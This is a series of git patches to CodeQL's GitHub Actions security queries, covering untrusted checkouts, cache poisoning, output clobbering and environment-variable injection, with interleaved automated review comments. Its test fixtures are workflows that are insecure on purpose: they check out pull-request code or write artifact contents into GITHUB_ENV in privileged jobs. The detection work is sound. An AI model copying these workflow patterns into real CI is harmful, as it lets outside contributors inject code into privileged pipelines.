From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 13 Jul 2024 23:29:36 +0200 Subject: [PATCH 418/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f5cf222d25c7..6b17e77e0634 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.20 +version: 0.1.21 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6def1dfc0c82..d17bc34b9ab6 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.20 +version: 0.1.21 groups: [actions, queries] suites: codeql-suites extractor: javascript From fc39249f924d5a8ed2a5ee5584a084b617543144 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 15 Jul 2024 21:00:28 +0200 Subject: [PATCH 419/707] feat(queries): Consider untrusted checkout as a source for code injections --- .../codeql/actions/dataflow/FlowSources.qll | 10 +++++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 37 ++++++++++++++----- ql/lib/qlpack.yml | 2 +- ql/src/Security/CWE-349/CachePoisoning.ql | 16 +++++--- ql/src/qlpack.yml | 2 +- .../.github/workflows/untrusted_checkout1.yml | 15 ++++++++ .../CWE-094/CodeInjectionCritical.expected | 8 ++++ .../CWE-094/CodeInjectionMedium.expected | 7 ++++ 8 files changed, 79 insertions(+), 18 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 31cf33782b0b..9f91af470b29 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
@@ -1,4 +1,5 @@ private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery private import codeql.actions.config.Config private import codeql.actions.dataflow.ExternalFlow @@ -112,6 +113,15 @@ private class ArtifactSource extends RemoteFlowSource { override string getSourceType() { result = "artifact" } } +/** + * A file from an untrusted checkout. + */ +private class CheckoutSource extends RemoteFlowSource { + CheckoutSource() { this.asExpr() instanceof PRHeadCheckoutStep } + + override string getSourceType() { result = "artifact" } +} + /** * A list of file names returned by dorny/paths-filter. */ diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 3caf80b7ca8e..e16bc00f8ea9 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -8,6 +8,7 @@ private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery /** * A unit class for adding additional taint steps. @@ -161,7 +162,11 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: * echo "::set-output name=id::$foo */ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, UntrustedArtifactDownloadStep download, string content, string key, string value | + exists(Run run, Step artifact, string content, string key, string value | + ( + artifact instanceof UntrustedArtifactDownloadStep or + artifact instanceof PRHeadCheckoutStep + ) and ( // A file is read and its content is assigned to an env var // - run: | 
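Review bot: `CheckoutSource.getSourceType()` reports `"artifact"` for a PR-head checkout step, so any query that dispatches on the source type cannot tell a checked-out tree from a downloaded artifact, and the class comment ("A file from an untrusted checkout") describes a file while the source is the checkout step itself. If folding checkouts into the artifact category is deliberate because downstream queries key on `"artifact"`, that should be stated in the comment; otherwise give the source its own label, e.g. `override string getSourceType() { result = "checkout" }`. Either way reword the comment to `/** A step that checks out a pull request head; the resulting working tree is controlled by the PR author. */` so readers know why it is a remote flow source.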
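Review bot: The disjunction `artifact instanceof UntrustedArtifactDownloadStep or artifact instanceof PRHeadCheckoutStep` introduced in `artifactToOutputStoreStep` is copied verbatim into `artifactToEnvStoreStep`, `artifactDownloadToRunStep` and `artifactDownloadToUsesStep` in the following hunks, and the doc comments of those predicates still say "A download artifact step followed by ..." although a checkout now also qualifies. Declaring the set once, e.g. `class UntrustedContentStep extends Step { UntrustedContentStep() { this instanceof UntrustedArtifactDownloadStep or this instanceof PRHeadCheckoutStep } }`, and binding `UntrustedContentStep artifact` in the four `exists` keeps the two lists from drifting apart when a third kind of untrusted step is added. The doc comments should read "A download artifact or untrusted checkout step followed by ..." to match. The body of `artifactToOutputStoreStep` continues outside this hunk.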
@@ -185,7 +190,7 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da outputsPartialFileContent(value) ) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - download.getAFollowingStep() = run and + artifact.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and succ.asExpr() = run ) @@ -199,7 +204,11 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da * echo "bar=${foo}" >> "$GITHUB_ENV" */ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string content, string key, string value, UntrustedArtifactDownloadStep download | + exists(Run run, string content, string key, string value, Step artifact | + ( + artifact instanceof UntrustedArtifactDownloadStep or + artifact instanceof PRHeadCheckoutStep + ) and ( // A file is read and its content is assigned to an env var // - run: | @@ -223,7 +232,7 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF outputsPartialFileContent(value) ) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - download.getAFollowingStep() = run and + artifact.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and // we store the taint on the enclosing job since there may not be an implicit env attribute succ.asExpr() = run.getEnclosingJob() 
@@ -234,10 +243,14 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF * A download artifact step followed by a step that may use downloaded artifacts. */ predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(UntrustedArtifactDownloadStep download, Run run | - pred.asExpr() = download and + exists(Step artifact, Run run | + ( + artifact instanceof UntrustedArtifactDownloadStep or + artifact instanceof PRHeadCheckoutStep + ) and + pred.asExpr() = artifact and succ.asExpr() = run.getScriptScalar() and - download.getAFollowingStep() = run + artifact.getAFollowingStep() = run ) } @@ -245,11 +258,15 @@ predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { * A download artifact step followed by a envvar-injection uses step . */ predicate artifactDownloadToUsesStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(UntrustedArtifactDownloadStep download, Uses uses | + exists(Step artifact, Uses uses | + ( + artifact instanceof UntrustedArtifactDownloadStep or + artifact instanceof PRHeadCheckoutStep + ) and madSink(succ, "envvar-injection") and - pred.asExpr() = download and + pred.asExpr() = artifact and succ.asExpr() = uses and - download.getAFollowingStep() = uses + artifact.getAFollowingStep() = uses ) } diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 6b17e77e0634..75d8cd5d2e0c 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.21 +version: 0.1.22 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 3b69110ed129..6609dae2b7f6 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql 
@@ -12,6 +12,7 @@ */ import actions +import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps @@ -19,13 +20,17 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from LocalJob j, Event e, PRHeadCheckoutStep checkout, Step s +from LocalJob j, Event e, Step artifact, Step s where + ( + artifact instanceof PRHeadCheckoutStep or + artifact instanceof UntrustedArtifactDownloadStep + ) and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and // the checkout is not controlled by an access check - not exists(ControlCheck check | check.protects(checkout, j.getATriggerEvent())) and + not exists(ControlCheck check | check.protects(artifact, j.getATriggerEvent())) and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(e) @@ -38,8 +43,7 @@ where ) ) and // the job checkouts untrusted code from a pull request - // TODO: Consider adding artifact downloads as a potential source of cache poisoning - j.getAStep() = checkout and + j.getAStep() = artifact and ( // the job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) @@ -49,9 +53,9 @@ where or // the job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) - checkout.getAFollowingStep() = s and + artifact.getAFollowingStep() = s and s instanceof PoisonableStep and // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) -select s, checkout, s, "Potential cache poisoning in the context of the default branch" +select s, artifact, s, "Potential cache poisoning in the context of the default branch" 
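Review bot: Several comments in this query are now stale: `// the checkout is not controlled by an access check`, `// the job checkouts untrusted code from a pull request` and `// (No need to follow the checkout step as the cache writing is normally done after the job completes)` all describe `artifact` as a checkout, while the new `from` clause also binds an `UntrustedArtifactDownloadStep`. Rewording them to, e.g., `// the untrusted step (PR checkout or artifact download) is not guarded by an access check` and `// the job checks out PR code or downloads an untrusted artifact` keeps the reasoning readable for the next maintainer. The alert message and the path element (`artifact`) are otherwise consistent with the widened source set; if the query's `@description` header above this hunk still speaks only of checkouts it presumably needs the same update.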
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index d17bc34b9ab6..ce8ab4c24dd4 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.21 +version: 0.1.22 groups: [actions, queries] suites: codeql-suites extractor: javascript diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml new file mode 100644 index 000000000000..8f691ed759db --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml @@ -0,0 +1,15 @@ +on: + pull_request_target + +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: artifact + run: | + echo "::set-output name=pr_number::$( Date: Mon, 15 Jul 2024 21:00:54 +0200 Subject: [PATCH 420/707] feat(queries): Experimental Output clobbering query --- .../security/OutputClobberingQuery.qll | 43 +++++++++++++++++++ .../CWE-094/OutputClobberingMedium.ql | 31 +++++++++++++ .../.github/workflows/output_clobbering1.yml | 20 +++++++++ .../.github/workflows/output_clobbering2.yml | 14 ++++++ 4 files changed, 108 insertions(+) create mode 100644 ql/lib/codeql/actions/security/OutputClobberingQuery.qll create mode 100644 ql/src/Security/CWE-094/OutputClobberingMedium.ql create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll new file mode 100644 index 000000000000..f1811ed57625 --- /dev/null +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll 
@@ -0,0 +1,43 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.security.CodeInjectionQuery +private import codeql.actions.security.ArtifactPoisoningQuery +import codeql.actions.dataflow.FlowSources +import codeql.actions.DataFlow + +abstract class OutputClobberingSource extends Step { } + +class RunOutputClobbering extends OutputClobberingSource, Run { + RunOutputClobbering() { + exists(UntrustedArtifactDownloadStep download, string script | + download.getAFollowingStep() = this and + this.getScript() = script and + exists(int i | + script.splitAt("\n", i).matches(["%GITHUB_OUTPUT%", "%::set-output name%"]) and + i < count(string line | line = script.splitAt("\n") | line) - 1 + ) + ) + } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate a code script. + */ +private module OutputClobberingConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source.asExpr() instanceof OutputClobberingSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node prev, DataFlow::Node succ) { + exists(StepsExpression e | + e.getTarget() = prev.asExpr() and + prev.asExpr() instanceof OutputClobberingSource and + succ.asExpr() = e + ) + } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ +module OutputClobberingFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-094/OutputClobberingMedium.ql b/ql/src/Security/CWE-094/OutputClobberingMedium.ql new file mode 100644 index 000000000000..7094a7891da1 --- /dev/null +++ b/ql/src/Security/CWE-094/OutputClobberingMedium.ql 
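Review bot: The "a later line exists" check `i < count(string line | line = script.splitAt("\n") | line) - 1` in `RunOutputClobbering` counts a trailing empty segment as a line, so if `getScript()` keeps the block scalar's final newline (the `.expected` labels elsewhere in this series end in `\n`, which suggests it does) a script whose `GITHUB_OUTPUT` write is the last real command still matches. Requiring a non-blank later line avoids that: `exists(int i, int j | i < j and script.splitAt("\n", i).matches(["%GITHUB_OUTPUT%", "%::set-output name%"]) and script.splitAt("\n", j).trim() != "")`. The source only accepts `UntrustedArtifactDownloadStep`, yet `output_clobbering2.yml` in this commit exercises a PR-head checkout and no `.expected` file is added, so it is unclear whether that workflow is meant to alert (via `PRHeadCheckoutStep`, as the previous commit did in FlowSteps.qll) or to be a negative case. The comments on `OutputClobberingConfig` and `OutputClobberingFlow` are copied from the code-injection configuration ("unsafe user input that is used to construct and evaluate a code script") and should instead describe this module's contract, e.g. `/** Tracks flow from a run step that writes a step output and then keeps executing, to a code-injection sink. */`.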
@@ -0,0 +1,31 @@ +/** + * @name Output Clobbering + * @description A Step output can be clobbered which may allow an attacker to manipulate the expected and trusted values of a variable. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision medium + * @id actions/output-clobbering/medium + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.OutputClobberingQuery +import OutputClobberingFlow::PathGraph + +from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink +where + OutputClobberingFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr()) and + // exclude cases where the sink is a JS script and the expression uses toJson + not exists(UsesStep script | + script.getCallee() = "actions/github-script" and + script.getArgumentExpr("script") = sink.getNode().asExpr() and + exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) + ) +select sink.getNode(), source, sink, "Potential output clobbering leading to code injection in $@.", + sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml new file mode 100644 index 000000000000..9012eda26492 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml 
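Review bot: The `@description` says only that "A Step output can be clobbered", while the query's sink is `CodeInjectionSink`, results are filtered by `inPrivilegedContext`, and the alert text reads "leading to code injection"; the header should state the condition actually reported, e.g. `@description A step writes a step output and then keeps executing; a later command can overwrite that output, and the clobbered value reaches a code-injection sink in a privileged context.`. The `not exists(UsesStep script | ...)` exclusion looks like the same block used by the code-injection queries; if so, a shared predicate would keep the two in step. The two workflows added in this commit have no accompanying `.expected` file, so the query's results are not pinned by the test suite.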
@@ -0,0 +1,20 @@ +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + - id: version + run: | + echo "version=10" >> "${GITHUB_OUTPUT}" + ls + - run: echo ${{ steps.version.outputs.version }} + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml new file mode 100644 index 000000000000..e2479e90636d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml @@ -0,0 +1,14 @@ +on: pull_request_target +jobs: + test: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: version + run: | + echo "version=10" >> "${GITHUB_OUTPUT}" + ls + - run: echo ${{ steps.version.outputs.version }} + From 15649afd5c2cfe2e53e0f643da1a62097adcafb3 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Jul 2024 12:44:27 +0200 Subject: [PATCH 421/707] feat(queries): Improve envvar injection queries Consider those cases where the contents of a file are written to a var and that var assigned to GITHUB_ENV --- .../security/EnvPathInjectionQuery.qll | 20 ++++++- .../actions/security/EnvVarInjectionQuery.qll | 20 ++++++- .../CWE-077/.github/workflows/test8.yml | 41 ++++++++++++++ .../CWE-077/.github/workflows/test9.yml | 41 ++++++++++++++ .../CWE-077/EnvVarInjectionCritical.expected | 14 +++++ .../CWE-077/EnvVarInjectionMedium.expected | 10 ++++ .../CWE-094/.github/workflows/test11.yml | 56 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 21 +++++++ .../CWE-094/CodeInjectionMedium.expected | 19 +++++++ 9 files changed, 240 insertions(+), 2 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 41e72bc83885..ee9f4843470f 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll 
@@ -20,7 +20,25 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and writeToGitHubPath(run, value) and - outputsPartialFileContent(value) + ( + outputsPartialFileContent(value) + or + // e.g. + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_PATH + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.matches("$(echo %") and value.indexOf(var_name) > 0 + ) + ) + ) ) } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 8dba1a21c908..652b97b887f5 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -22,7 +22,25 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { step.getAFollowingStep() = run and writeToGitHubEnv(run, content) and extractVariableAndValue(content, _, value) and - outputsPartialFileContent(value) + ( + outputsPartialFileContent(value) + or + // e.g. + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.matches("$(echo %") and value.indexOf(var_name) > 0 + ) + ) + ) ) } } 
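Review bot: The variable-name matching in the new branch is looser than the surrounding logic: `value.matches("%$" + ["", "{", "ENV{"] + var_name + "%")` also accepts `$foobar` when `var_name` is `foo`, and `value.indexOf(var_name) > 0` accepts any substring occurrence, so `var_name = "ref"` matches `$(echo $prefix)`. A boundary-aware regex such as `value.regexpMatch(".*\\$(\\{|ENV\\{)?" + var_name + "\\b.*")` for the first case, and the same pattern applied to the `$(echo %` case, keeps the new file-read-to-env detection from reporting unrelated variables. The same 18-line block is duplicated verbatim in the EnvVarInjectionQuery.qll hunk below; a shared predicate (say `predicate fileContentAssignedToVar(Run run, string value)`) would let both sinks share one implementation and one set of tests. Worth a comment that `regexpCapture` matches the whole line, so `export FOO=$(cat ...)` and `local FOO=...` are intentionally (or not) outside the heuristic.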
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml new file mode 100644 index 000000000000..05bde57551db --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml @@ -0,0 +1,41 @@ +name: Tests + +on: + workflow_run: + workflows: ["tests"] + types: + - completed + +permissions: { contents: read } + +jobs: + unit-test-results: + name: Test + runs-on: ubuntu-latest + permissions: + actions: write + statuses: write + checks: write + pull-requests: write + contents: write + steps: + - uses: actions/checkout@v4 + with: + ref: foo + + - name: Download and Extract Artifacts + uses: dawidd6/action-download-artifact@v6 + with: + run_id: ${{ github.event.workflow_run.id }} + path: ./artifacts + + - name: assignment + run: | + foo=$(cat ./artifacts/parent-artifacts/event.txt) + echo "foo=$foo" >> $GITHUB_ENV + - name: direct 1 + run: | + echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV + - name: direct 2 + run: | + echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml new file mode 100644 index 000000000000..3ed80374ef65 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml 
@@ -0,0 +1,41 @@ +name: tests + +on: + workflow_run: + workflows: ["Tests"] + types: + - completed + +permissions: { contents: read } + +jobs: + get-artifacts: + name: Get required artifacts + runs-on: ubuntu-latest + permissions: + actions: read + statuses: write + steps: + - name: Download and extract event file + uses: actions/download-artifact@v4 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + run-id: ${{ github.event.workflow_run.id }} + name: event_file + path: artifacts/event_file + + - name: Try to read PR number + id: set-ref + run: | + pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) + if [ -z "$pr_num" ] || [ "$pr_num" == "null" ]; then + pr_num="" + fi + + ref=$pr_num + if [ -z "$ref" ] || [ "$ref" == "null" ]; then + ref=${{ github.ref }} + fi + + echo "pr_num=$pr_num" >> $GITHUB_ENV + echo "ref=$ref" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 02aed1c05cbb..7d92032f00b7 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -15,6 +15,10 @@ edges | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -48,6 +52,12 @@ nodes | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> 
$GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
